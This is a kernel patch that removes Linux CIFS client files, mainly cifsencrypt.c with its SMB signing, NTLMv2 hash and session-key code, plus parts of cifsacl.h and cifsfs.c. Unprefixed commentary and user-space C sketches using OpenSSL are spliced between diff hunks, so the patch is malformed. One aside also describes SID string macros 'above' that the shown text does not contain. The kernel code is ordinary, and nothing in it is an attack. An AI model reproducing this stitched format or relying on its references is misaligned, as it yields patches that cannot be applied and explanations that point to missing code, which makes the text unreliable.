+-	u8 Sbz1; /* MBZ */
+-	__le16 AclSize;
+-	__le16 AceCount;
+-	__le16 Sbz2; /* MBZ */
+-} __packed;
+-
+-/*
+- * Used to store the special 'NFS SIDs' used to persist the POSIX uid and gid
+- * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-struct owner_sid {
+-	u8 Revision;
+-	u8 NumAuth;
+-	u8 Authority[6];
+-	__le32 SubAuthorities[3];
+-} __packed;
+-
+-struct owner_group_sids {
+-	struct owner_sid owner;
+-	struct owner_sid group;
+-} __packed;
+-
+-/*
+- * The minimum security identifier can be one for system-defined Users
+- * and Groups, such as NULL SID and World, or Built-in accounts such
+- * as Administrator and Guest, and consists of
+- * Revision + Num (Sub)Auths + Authority + Domain (one Subauthority)
+- */
+-#define MIN_SID_LEN  (1 + 1 + 6 + 4) /* in bytes */
+-
+-/*
+- * Minimum security descriptor can be one without any SACL and DACL and can
+- * consist of revision, type, and two sids of minimum size for owner and group
+- */
+-#define MIN_SEC_DESC_LEN  (sizeof(struct cifs_ntsd) + (2 * MIN_SID_LEN))
+-
+-#endif /* _CIFSACL_H */
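As an aside, the SID string sizing macros above bound the buffer needed to print any SID in "S-..." form; a minimal user-space sketch of the worst case (not part of the patch):

#include <stdio.h>

#define SID_STRING_BASE_SIZE	(2 + 3 + 15 + 1)	/* "S-" + revision + authority + NUL */
#define SID_STRING_SUBAUTH_SIZE	11			/* '-' plus up to 10 decimal digits */
#define SID_MAX_SUB_AUTHORITIES	15

int main(void)
{
	/* worst case: all 15 subauthorities present */
	printf("max SID string: %d bytes\n",
	       SID_STRING_BASE_SIZE +
	       SID_MAX_SUB_AUTHORITIES * SID_STRING_SUBAUTH_SIZE);	/* 186 */
	return 0;
}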
+diff --git a/fs/cifs/cifsencrypt.c b/fs/cifs/cifsencrypt.c
+deleted file mode 100644
+index cbc18b4a9cb20..0000000000000
+--- a/fs/cifs/cifsencrypt.c
++++ /dev/null
+@@ -1,733 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Encryption and hashing operations relating to NTLM, NTLMv2.  See MS-NLMP
+- *   for more detailed information
+- *
+- *   Copyright (C) International Business Machines  Corp., 2005,2013
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "cifsproto.h"
+-#include "ntlmssp.h"
+-#include <linux/ctype.h>
+-#include <linux/random.h>
+-#include <linux/highmem.h>
+-#include <linux/fips.h>
+-#include "../smbfs_common/arc4.h"
+-#include <crypto/aead.h>
+-
+-int __cifs_calc_signature(struct smb_rqst *rqst,
+-			struct TCP_Server_Info *server, char *signature,
+-			struct shash_desc *shash)
+-{
+-	int i;
+-	int rc;
+-	struct kvec *iov = rqst->rq_iov;
+-	int n_vec = rqst->rq_nvec;
+-
+-	/* iov[0] is actual data and not the rfc1002 length for SMB2+ */
+-	if (!is_smb1(server)) {
+-		if (iov[0].iov_len <= 4)
+-			return -EIO;
+-		i = 0;
+-	} else {
+-		if (n_vec < 2 || iov[0].iov_len != 4)
+-			return -EIO;
+-		i = 1; /* skip rfc1002 length */
+-	}
+-
+-	for (; i < n_vec; i++) {
+-		if (iov[i].iov_len == 0)
+-			continue;
+-		if (iov[i].iov_base == NULL) {
+-			cifs_dbg(VFS, "null iovec entry\n");
+-			return -EIO;
+-		}
+-
+-		rc = crypto_shash_update(shash,
+-					 iov[i].iov_base, iov[i].iov_len);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with payload\n",
+-				 __func__);
+-			return rc;
+-		}
+-	}
+-
+-	/* now hash over the rq_pages array */
+-	for (i = 0; i < rqst->rq_npages; i++) {
+-		void *kaddr;
+-		unsigned int len, offset;
+-
+-		rqst_page_get_length(rqst, i, &len, &offset);
+-
+-		kaddr = (char *) kmap(rqst->rq_pages[i]) + offset;
+-
+-		rc = crypto_shash_update(shash, kaddr, len);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with payload\n",
+-				 __func__);
+-			kunmap(rqst->rq_pages[i]);
+-			return rc;
+-		}
+-
+-		kunmap(rqst->rq_pages[i]);
+-	}
+-
+-	rc = crypto_shash_final(shash, signature);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate hash\n", __func__);
+-
+-	return rc;
+-}
+-
+-/*
+- * Calculate and return the CIFS signature based on the mac key and SMB PDU.
+- * The 16 byte signature must be allocated by the caller. Note we only use the
+- * 1st eight bytes and that the smb header signature field on input contains
+- * the sequence number before this function is called. Also, this function
+- * should be called with the server->srv_mutex held.
+- */
+-static int cifs_calc_signature(struct smb_rqst *rqst,
+-			struct TCP_Server_Info *server, char *signature)
+-{
+-	int rc;
+-
+-	if (!rqst->rq_iov || !signature || !server)
+-		return -EINVAL;
+-
+-	rc = cifs_alloc_hash("md5", &server->secmech.md5);
+-	if (rc)
+-		return -1;
+-
+-	rc = crypto_shash_init(server->secmech.md5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init md5\n", __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.md5,
+-		server->session_key.response, server->session_key.len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
+-		return rc;
+-	}
+-
+-	return __cifs_calc_signature(rqst, server, signature, server->secmech.md5);
+-}
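To make the signing scheme concrete: a hedged user-space sketch of what cifs_calc_signature() computes, i.e. MD5 over the session key followed by the whole PDU, truncated to the 8 bytes that go on the wire. It uses OpenSSL's legacy one-shot MD5 API purely for illustration; the kernel code above uses the crypto shash interface instead.

#include <string.h>
#include <openssl/md5.h>	/* legacy API; fine for a sketch */

static void smb1_sign(const unsigned char *session_key, size_t key_len,
		      const unsigned char *pdu, size_t pdu_len,
		      unsigned char signature[8])
{
	unsigned char digest[MD5_DIGEST_LENGTH];
	MD5_CTX ctx;

	MD5_Init(&ctx);
	MD5_Update(&ctx, session_key, key_len);	/* session key first */
	/* then the full PDU, whose signature field already holds the
	 * sequence number at this point */
	MD5_Update(&ctx, pdu, pdu_len);
	MD5_Final(digest, &ctx);
	memcpy(signature, digest, 8);	/* only 8 bytes are sent */
}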
+-
+-/* must be called with server->srv_mutex held */
+-int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-		   __u32 *pexpected_response_sequence_number)
+-{
+-	int rc = 0;
+-	char smb_signature[20];
+-	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return -EIO;
+-
+-	if ((cifs_pdu == NULL) || (server == NULL))
+-		return -EINVAL;
+-
+-	spin_lock(&server->srv_lock);
+-	if (!(cifs_pdu->Flags2 & SMBFLG2_SECURITY_SIGNATURE) ||
+-	    server->tcpStatus == CifsNeedNegotiate) {
+-		spin_unlock(&server->srv_lock);
+-		return rc;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	if (!server->session_estab) {
+-		memcpy(cifs_pdu->Signature.SecuritySignature, "BSRSPYL", 8);
+-		return rc;
+-	}
+-
+-	cifs_pdu->Signature.Sequence.SequenceNumber =
+-				cpu_to_le32(server->sequence_number);
+-	cifs_pdu->Signature.Sequence.Reserved = 0;
+-
+-	*pexpected_response_sequence_number = ++server->sequence_number;
+-	++server->sequence_number;
+-
+-	rc = cifs_calc_signature(rqst, server, smb_signature);
+-	if (rc)
+-		memset(cifs_pdu->Signature.SecuritySignature, 0, 8);
+-	else
+-		memcpy(cifs_pdu->Signature.SecuritySignature, smb_signature, 8);
+-
+-	return rc;
+-}
+-
+-int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *server,
+-		   __u32 *pexpected_response_sequence)
+-{
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = n_vec };
+-
+-	return cifs_sign_rqst(&rqst, server, pexpected_response_sequence);
+-}
+-
+-/* must be called with server->srv_mutex held */
+-int cifs_sign_smb(struct smb_hdr *cifs_pdu, struct TCP_Server_Info *server,
+-		  __u32 *pexpected_response_sequence_number)
+-{
+-	struct kvec iov[2];
+-
+-	iov[0].iov_base = cifs_pdu;
+-	iov[0].iov_len = 4;
+-	iov[1].iov_base = (char *)cifs_pdu + 4;
+-	iov[1].iov_len = be32_to_cpu(cifs_pdu->smb_buf_length);
+-
+-	return cifs_sign_smbv(iov, 2, server,
+-			      pexpected_response_sequence_number);
+-}
+-
+-int cifs_verify_signature(struct smb_rqst *rqst,
+-			  struct TCP_Server_Info *server,
+-			  __u32 expected_sequence_number)
+-{
+-	unsigned int rc;
+-	char server_response_sig[8];
+-	char what_we_think_sig_should_be[20];
+-	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return -EIO;
+-
+-	if (cifs_pdu == NULL || server == NULL)
+-		return -EINVAL;
+-
+-	if (!server->session_estab)
+-		return 0;
+-
+-	if (cifs_pdu->Command == SMB_COM_LOCKING_ANDX) {
+-		struct smb_com_lock_req *pSMB =
+-			(struct smb_com_lock_req *)cifs_pdu;
+-		if (pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE)
+-			return 0;
+-	}
+-
+-	/* BB what if signatures are supposed to be on for session but
+-	   server does not send one? BB */
+-
+-	/* Do not need to verify session setups with signature "BSRSPYL "  */
+-	if (memcmp(cifs_pdu->Signature.SecuritySignature, "BSRSPYL ", 8) == 0)
+-		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
+-			 cifs_pdu->Command);
+-
+-	/* save off the original signature so we can modify the smb and check
+-		its signature against what the server sent */
+-	memcpy(server_response_sig, cifs_pdu->Signature.SecuritySignature, 8);
+-
+-	cifs_pdu->Signature.Sequence.SequenceNumber =
+-					cpu_to_le32(expected_sequence_number);
+-	cifs_pdu->Signature.Sequence.Reserved = 0;
+-
+-	cifs_server_lock(server);
+-	rc = cifs_calc_signature(rqst, server, what_we_think_sig_should_be);
+-	cifs_server_unlock(server);
+-
+-	if (rc)
+-		return rc;
+-
+-/*	cifs_dump_mem("what we think it should be: ",
+-		      what_we_think_sig_should_be, 16); */
+-
+-	if (memcmp(server_response_sig, what_we_think_sig_should_be, 8))
+-		return -EACCES;
+-	else
+-		return 0;
+-
+-}
+-
+-/* Build a proper attribute value/target info pairs blob.
+- * Fill in netbios and dns domain name and workstation name
+- * and client time (five av pairs total, plus one end-of-fields indicator).
+- * Allocate domain name which gets freed when session struct is deallocated.
+- */
+-static int
+-build_avpair_blob(struct cifs_ses *ses, const struct nls_table *nls_cp)
+-{
+-	unsigned int dlen;
+-	unsigned int size = 2 * sizeof(struct ntlmssp2_name);
+-	char *defdmname = "WORKGROUP";
+-	unsigned char *blobptr;
+-	struct ntlmssp2_name *attrptr;
+-
+-	if (!ses->domainName) {
+-		ses->domainName = kstrdup(defdmname, GFP_KERNEL);
+-		if (!ses->domainName)
+-			return -ENOMEM;
+-	}
+-
+-	dlen = strlen(ses->domainName);
+-
+-	/*
+-	 * The length of this blob is two times the size of a
+-	 * structure (av pair) which holds name/size
+-	 * (for NTLMSSP_AV_NB_DOMAIN_NAME followed by NTLMSSP_AV_EOL) plus
+-	 * the unicode length of a netbios domain name
+-	 */
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.len = size + 2 * dlen;
+-	ses->auth_key.response = kzalloc(ses->auth_key.len, GFP_KERNEL);
+-	if (!ses->auth_key.response) {
+-		ses->auth_key.len = 0;
+-		return -ENOMEM;
+-	}
+-
+-	blobptr = ses->auth_key.response;
+-	attrptr = (struct ntlmssp2_name *) blobptr;
+-
+-	/*
+-	 * As defined in MS-NTLM 3.3.2, just this av pair field
+-	 * is sufficient as part of the temp
+-	 */
+-	attrptr->type = cpu_to_le16(NTLMSSP_AV_NB_DOMAIN_NAME);
+-	attrptr->length = cpu_to_le16(2 * dlen);
+-	blobptr = (unsigned char *)attrptr + sizeof(struct ntlmssp2_name);
+-	cifs_strtoUTF16((__le16 *)blobptr, ses->domainName, dlen, nls_cp);
+-
+-	return 0;
+-}
+-
+-/* Server has provided av pairs/target info in the type 2 challenge
+- * packet and we have plucked it and stored within smb session.
+- * We parse that blob here to find netbios domain name to be used
+- * as part of ntlmv2 authentication (in Target String), if not already
+- * specified on the command line.
+- * If this function returns without any error but without fetching
+- * a domain name, authentication may fail against some servers but
+- * not against others (those that are not very particular about the
+- * target string, i.e. for some, just the user name might suffice).
+- */
+-static int
+-find_domain_name(struct cifs_ses *ses, const struct nls_table *nls_cp)
+-{
+-	unsigned int attrsize;
+-	unsigned int type;
+-	unsigned int onesize = sizeof(struct ntlmssp2_name);
+-	unsigned char *blobptr;
+-	unsigned char *blobend;
+-	struct ntlmssp2_name *attrptr;
+-
+-	if (!ses->auth_key.len || !ses->auth_key.response)
+-		return 0;
+-
+-	blobptr = ses->auth_key.response;
+-	blobend = blobptr + ses->auth_key.len;
+-
+-	while (blobptr + onesize < blobend) {
+-		attrptr = (struct ntlmssp2_name *) blobptr;
+-		type = le16_to_cpu(attrptr->type);
+-		if (type == NTLMSSP_AV_EOL)
+-			break;
+-		blobptr += 2; /* advance attr type */
+-		attrsize = le16_to_cpu(attrptr->length);
+-		blobptr += 2; /* advance attr size */
+-		if (blobptr + attrsize > blobend)
+-			break;
+-		if (type == NTLMSSP_AV_NB_DOMAIN_NAME) {
+-			if (!attrsize || attrsize >= CIFS_MAX_DOMAINNAME_LEN)
+-				break;
+-			if (!ses->domainName) {
+-				ses->domainName =
+-					kmalloc(attrsize + 1, GFP_KERNEL);
+-				if (!ses->domainName)
+-						return -ENOMEM;
+-				cifs_from_utf16(ses->domainName,
+-					(__le16 *)blobptr, attrsize, attrsize,
+-					nls_cp, NO_MAP_UNI_RSVD);
+-				break;
+-			}
+-		}
+-		blobptr += attrsize; /* advance attr  value */
+-	}
+-
+-	return 0;
+-}
+-
+-/* Server has provided av pairs/target info in the type 2 challenge
+- * packet and we have plucked it and stored within smb session.
+- * We parse that blob here to find the server-given timestamp
+- * as part of ntlmv2 authentication (or local current time as
+- * default in case of failure)
+- */
+-static __le64
+-find_timestamp(struct cifs_ses *ses)
+-{
+-	unsigned int attrsize;
+-	unsigned int type;
+-	unsigned int onesize = sizeof(struct ntlmssp2_name);
+-	unsigned char *blobptr;
+-	unsigned char *blobend;
+-	struct ntlmssp2_name *attrptr;
+-	struct timespec64 ts;
+-
+-	if (!ses->auth_key.len || !ses->auth_key.response)
+-		return 0;
+-
+-	blobptr = ses->auth_key.response;
+-	blobend = blobptr + ses->auth_key.len;
+-
+-	while (blobptr + onesize < blobend) {
+-		attrptr = (struct ntlmssp2_name *) blobptr;
+-		type = le16_to_cpu(attrptr->type);
+-		if (type == NTLMSSP_AV_EOL)
+-			break;
+-		blobptr += 2; /* advance attr type */
+-		attrsize = le16_to_cpu(attrptr->length);
+-		blobptr += 2; /* advance attr size */
+-		if (blobptr + attrsize > blobend)
+-			break;
+-		if (type == NTLMSSP_AV_TIMESTAMP) {
+-			if (attrsize == sizeof(u64))
+-				return *((__le64 *)blobptr);
+-		}
+-		blobptr += attrsize; /* advance attr value */
+-	}
+-
+-	ktime_get_real_ts64(&ts);
+-	return cpu_to_le64(cifs_UnixTimeToNT(ts));
+-}
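For reference, the target-info blob walked by find_domain_name() and find_timestamp() above is a flat sequence of AV pairs: a little-endian u16 type, a little-endian u16 length, then the value, terminated by an NTLMSSP_AV_EOL pair. A hedged encoder sketch for that layout (user-space C, little-endian host assumed):

#include <stdint.h>
#include <string.h>

#define NTLMSSP_AV_EOL			0
#define NTLMSSP_AV_NB_DOMAIN_NAME	2

struct av_pair {
	uint16_t type;		/* wire format is little-endian */
	uint16_t length;
} __attribute__((packed));

/* append one AV pair to buf; returns the number of bytes written */
static size_t av_put(uint8_t *buf, uint16_t type, const void *val, uint16_t len)
{
	struct av_pair hdr = { .type = type, .length = len };

	memcpy(buf, &hdr, sizeof(hdr));
	if (len)
		memcpy(buf + sizeof(hdr), val, len);
	return sizeof(hdr) + len;
}

A blob then ends with av_put(p, NTLMSSP_AV_EOL, NULL, 0), which is exactly the terminator the parsing loops above stop on.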
+-
+-static int calc_ntlmv2_hash(struct cifs_ses *ses, char *ntlmv2_hash,
+-			    const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	int len;
+-	char nt_hash[CIFS_NTHASH_SIZE];
+-	__le16 *user;
+-	wchar_t *domain;
+-	wchar_t *server;
+-
+-	if (!ses->server->secmech.hmacmd5) {
+-		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
+-		return -1;
+-	}
+-
+-	/* calculate md4 hash of password */
+-	E_md4hash(ses->password, nt_hash, nls_cp);
+-
+-	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm, nt_hash,
+-				CIFS_NTHASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not set NT Hash as a key\n", __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
+-		return rc;
+-	}
+-
+-	/* convert ses->user_name to unicode */
+-	len = ses->user_name ? strlen(ses->user_name) : 0;
+-	user = kmalloc(2 + (len * 2), GFP_KERNEL);
+-	if (user == NULL) {
+-		rc = -ENOMEM;
+-		return rc;
+-	}
+-
+-	if (len) {
+-		len = cifs_strtoUTF16(user, ses->user_name, len, nls_cp);
+-		UniStrupr(user);
+-	} else {
+-		memset(user, '\0', 2);
+-	}
+-
+-	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+-				(char *)user, 2 * len);
+-	kfree(user);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with user\n", __func__);
+-		return rc;
+-	}
+-
+-	/* convert ses->domainName to unicode and uppercase */
+-	if (ses->domainName) {
+-		len = strlen(ses->domainName);
+-
+-		domain = kmalloc(2 + (len * 2), GFP_KERNEL);
+-		if (domain == NULL) {
+-			rc = -ENOMEM;
+-			return rc;
+-		}
+-		len = cifs_strtoUTF16((__le16 *)domain, ses->domainName, len,
+-				      nls_cp);
+-		rc =
+-		crypto_shash_update(ses->server->secmech.hmacmd5,
+-					(char *)domain, 2 * len);
+-		kfree(domain);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with domain\n",
+-				 __func__);
+-			return rc;
+-		}
+-	} else {
+-		/* We use ses->ip_addr if no domain name available */
+-		len = strlen(ses->ip_addr);
+-
+-		server = kmalloc(2 + (len * 2), GFP_KERNEL);
+-		if (server == NULL) {
+-			rc = -ENOMEM;
+-			return rc;
+-		}
+-		len = cifs_strtoUTF16((__le16 *)server, ses->ip_addr, len,
+-					nls_cp);
+-		rc =
+-		crypto_shash_update(ses->server->secmech.hmacmd5,
+-					(char *)server, 2 * len);
+-		kfree(server);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with server\n",
+-				 __func__);
+-			return rc;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
+-					ntlmv2_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-	return rc;
+-}
+-
+-static int
+-CalcNTLMv2_response(const struct cifs_ses *ses, char *ntlmv2_hash)
+-{
+-	int rc;
+-	struct ntlmv2_resp *ntlmv2 = (struct ntlmv2_resp *)
+-	    (ses->auth_key.response + CIFS_SESS_KEY_SIZE);
+-	unsigned int hash_len;
+-
+-	/* The MD5 hash starts at challenge_key.key */
+-	hash_len = ses->auth_key.len - (CIFS_SESS_KEY_SIZE +
+-		offsetof(struct ntlmv2_resp, challenge.key[0]));
+-
+-	if (!ses->server->secmech.hmacmd5) {
+-		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
+-		return -1;
+-	}
+-
+-	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
+-				 ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
+-			 __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
+-		return rc;
+-	}
+-
+-	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED)
+-		memcpy(ntlmv2->challenge.key,
+-		       ses->ntlmssp->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
+-	else
+-		memcpy(ntlmv2->challenge.key,
+-		       ses->server->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
+-	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+-				 ntlmv2->challenge.key, hash_len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
+-		return rc;
+-	}
+-
+-	/* Note that the MD5 digest overwrites anon.challenge_key.key */
+-	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
+-				ntlmv2->ntlmv2_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-	return rc;
+-}
+-
+-int
+-setup_ntlmv2_rsp(struct cifs_ses *ses, const struct nls_table *nls_cp)
+-{
+-	int rc;
+-	int baselen;
+-	unsigned int tilen;
+-	struct ntlmv2_resp *ntlmv2;
+-	char ntlmv2_hash[16];
+-	unsigned char *tiblob = NULL; /* target info blob */
+-	__le64 rsp_timestamp;
+-
+-	if (nls_cp == NULL) {
+-		cifs_dbg(VFS, "%s called with nls_cp==NULL\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED) {
+-		if (!ses->domainName) {
+-			if (ses->domainAuto) {
+-				rc = find_domain_name(ses, nls_cp);
+-				if (rc) {
+-					cifs_dbg(VFS, "error %d finding domain name\n",
+-						 rc);
+-					goto setup_ntlmv2_rsp_ret;
+-				}
+-			} else {
+-				ses->domainName = kstrdup("", GFP_KERNEL);
+-			}
+-		}
+-	} else {
+-		rc = build_avpair_blob(ses, nls_cp);
+-		if (rc) {
+-			cifs_dbg(VFS, "error %d building av pair blob\n", rc);
+-			goto setup_ntlmv2_rsp_ret;
+-		}
+-	}
+-
+-	/* Must be within 5 minutes of the server (or in range +/-2h
+-	 * in case of Mac OS X), so simply carry over server timestamp
+-	 * (as Windows 7 does)
+-	 */
+-	rsp_timestamp = find_timestamp(ses);
+-
+-	baselen = CIFS_SESS_KEY_SIZE + sizeof(struct ntlmv2_resp);
+-	tilen = ses->auth_key.len;
+-	tiblob = ses->auth_key.response;
+-
+-	ses->auth_key.response = kmalloc(baselen + tilen, GFP_KERNEL);
+-	if (!ses->auth_key.response) {
+-		rc = -ENOMEM;
+-		ses->auth_key.len = 0;
+-		goto setup_ntlmv2_rsp_ret;
+-	}
+-	ses->auth_key.len += baselen;
+-
+-	ntlmv2 = (struct ntlmv2_resp *)
+-			(ses->auth_key.response + CIFS_SESS_KEY_SIZE);
+-	ntlmv2->blob_signature = cpu_to_le32(0x00000101);
+-	ntlmv2->reserved = 0;
+-	ntlmv2->time = rsp_timestamp;
+-
+-	get_random_bytes(&ntlmv2->client_chal, sizeof(ntlmv2->client_chal));
+-	ntlmv2->reserved2 = 0;
+-
+-	memcpy(ses->auth_key.response + baselen, tiblob, tilen);
+-
+-	cifs_server_lock(ses->server);
+-
+-	rc = cifs_alloc_hash("hmac(md5)", &ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		goto unlock;
+-	}
+-
+-	/* calculate ntlmv2_hash */
+-	rc = calc_ntlmv2_hash(ses, ntlmv2_hash, nls_cp);
+-	if (rc) {
+-		cifs_dbg(VFS, "Could not get v2 hash rc %d\n", rc);
+-		goto unlock;
+-	}
+-
+-	/* calculate first part of the client response (CR1) */
+-	rc = CalcNTLMv2_response(ses, ntlmv2_hash);
+-	if (rc) {
+-		cifs_dbg(VFS, "Could not calculate CR1 rc: %d\n", rc);
+-		goto unlock;
+-	}
+-
+-	/* now calculate the session key for NTLMv2 */
+-	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
+-		ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
+-			 __func__);
+-		goto unlock;
+-	}
+-
+-	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
+-		goto unlock;
+-	}
+-
+-	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+-		ntlmv2->ntlmv2_hash,
+-		CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
+-		goto unlock;
+-	}
+-
+-	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
+-		ses->auth_key.response);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-unlock:
+-	cifs_server_unlock(ses->server);
+-setup_ntlmv2_rsp_ret:
+-	kfree_sensitive(tiblob);
+-
+-	return rc;
+-}
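Stepping back, calc_ntlmv2_hash(), CalcNTLMv2_response() and the tail of setup_ntlmv2_rsp() together implement the MS-NLMP NTLMv2 key schedule. A hedged user-space sketch of one step, using OpenSSL's one-shot HMAC() purely for illustration (the kernel code above uses the crypto shash API):

#include <openssl/evp.h>
#include <openssl/hmac.h>

/*
 * The three HMAC-MD5 stages performed above:
 *   ntlmv2_hash = HMAC-MD5(NT hash, UTF16LE(upper(user)) + UTF16LE(domain))
 *   nt_proof    = HMAC-MD5(ntlmv2_hash, server_challenge || client blob)
 *   session_key = HMAC-MD5(ntlmv2_hash, nt_proof)
 */
static void hmac_md5(const unsigned char *key, int key_len,
		     const unsigned char *msg, size_t msg_len,
		     unsigned char out[16])
{
	unsigned int out_len = 16;

	HMAC(EVP_md5(), key, key_len, msg, msg_len, out, &out_len);
}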
+-
+-int
+-calc_seckey(struct cifs_ses *ses)
+-{
+-	unsigned char sec_key[CIFS_SESS_KEY_SIZE]; /* a nonce */
+-	struct arc4_ctx *ctx_arc4;
+-
+-	if (fips_enabled)
+-		return -ENODEV;
+-
+-	get_random_bytes(sec_key, CIFS_SESS_KEY_SIZE);
+-
+-	ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
+-	if (!ctx_arc4) {
+-		cifs_dbg(VFS, "Could not allocate arc4 context\n");
+-		return -ENOMEM;
+-	}
+-
+-	cifs_arc4_setkey(ctx_arc4, ses->auth_key.response, CIFS_SESS_KEY_SIZE);
+-	cifs_arc4_crypt(ctx_arc4, ses->ntlmssp->ciphertext, sec_key,
+-			CIFS_CPHTXT_SIZE);
+-
+-	/* make secondary_key/nonce as session key */
+-	memcpy(ses->auth_key.response, sec_key, CIFS_SESS_KEY_SIZE);
+-	/* and make len as that of session key only */
+-	ses->auth_key.len = CIFS_SESS_KEY_SIZE;
+-
+-	memzero_explicit(sec_key, CIFS_SESS_KEY_SIZE);
+-	kfree_sensitive(ctx_arc4);
+-	return 0;
+-}
+-
+-void
+-cifs_crypto_secmech_release(struct TCP_Server_Info *server)
+-{
+-	cifs_free_hash(&server->secmech.aes_cmac);
+-	cifs_free_hash(&server->secmech.hmacsha256);
+-	cifs_free_hash(&server->secmech.md5);
+-	cifs_free_hash(&server->secmech.sha512);
+-	cifs_free_hash(&server->secmech.hmacmd5);
+-
+-	if (server->secmech.enc) {
+-		crypto_free_aead(server->secmech.enc);
+-		server->secmech.enc = NULL;
+-	}
+-
+-	if (server->secmech.dec) {
+-		crypto_free_aead(server->secmech.dec);
+-		server->secmech.dec = NULL;
+-	}
+-}
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+deleted file mode 100644
+index 078df1e2dd18a..0000000000000
+--- a/fs/cifs/cifsfs.c
++++ /dev/null
+@@ -1,1857 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Common Internet FileSystem (CIFS) client
+- *
+- */
+-
+-/* Note that BB means BUGBUG (ie something to fix eventually) */
+-
+-#include <linux/module.h>
+-#include <linux/fs.h>
+-#include <linux/mount.h>
+-#include <linux/slab.h>
+-#include <linux/init.h>
+-#include <linux/list.h>
+-#include <linux/seq_file.h>
+-#include <linux/vfs.h>
+-#include <linux/mempool.h>
+-#include <linux/delay.h>
+-#include <linux/kthread.h>
+-#include <linux/freezer.h>
+-#include <linux/namei.h>
+-#include <linux/random.h>
+-#include <linux/uuid.h>
+-#include <linux/xattr.h>
+-#include <uapi/linux/magic.h>
+-#include <net/ipv6.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#define DECLARE_GLOBALS_HERE
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include <linux/mm.h>
+-#include <linux/key-type.h>
+-#include "cifs_spnego.h"
+-#include "fscache.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-#include "netlink.h"
